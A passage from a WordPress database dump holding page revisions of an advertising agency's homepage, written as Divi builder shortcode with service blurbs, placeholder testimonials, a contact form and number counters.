body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-28 21:31:04','2020-07-28 21:31:04','',134,'https://52.66.212.87/2020/07/28/134-revision-v1/',0,'revision','',0),(368,1,'2020-07-28 21:37:30','2020-07-28 21:37:30','<!-- wp:elfsight-whatsapp-chat/block {\"id\":\"1\",\"exist\":true} /-->','LANDING PAGE','','inherit','closed','closed','','226-revision-v1','','','2020-07-28 21:37:30','2020-07-28 21:37:30','',226,'https://52.66.212.87/2020/07/28/226-revision-v1/',0,'revision','',0),(372,1,'2020-07-29 19:05:28','2020-07-29 19:05:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" 